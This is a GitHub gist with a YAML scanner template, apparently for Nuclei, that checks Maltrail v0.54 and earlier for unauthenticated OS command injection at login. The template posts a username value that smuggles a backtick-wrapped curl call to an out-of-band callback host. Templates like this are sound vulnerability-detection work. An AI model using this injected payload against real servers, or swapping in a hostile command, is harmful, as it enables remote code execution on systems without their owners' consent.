Created
July 10, 2023 17:28
-
-
Save Esonhugh/92a853b1ca45bcdec1874dc80d2053ad to your computer and use it in GitHub Desktop.
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: maltrail-os-command-injection | |
info: | |
author: Esonhugh | |
name: Unauthenticated OS Command Injection in stamparm/maltrail | |
severity: critical | |
description: | | |
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process. | |
reference: | |
- "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/" | |
variables: | |
payload: "curl+{{interactsh-url}}" | |
http: | |
- path: | |
- "{{BaseURL}}/login" | |
- "{{BaseURL}}login" | |
method: POST | |
body: "username=;`{{ payload }}`" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment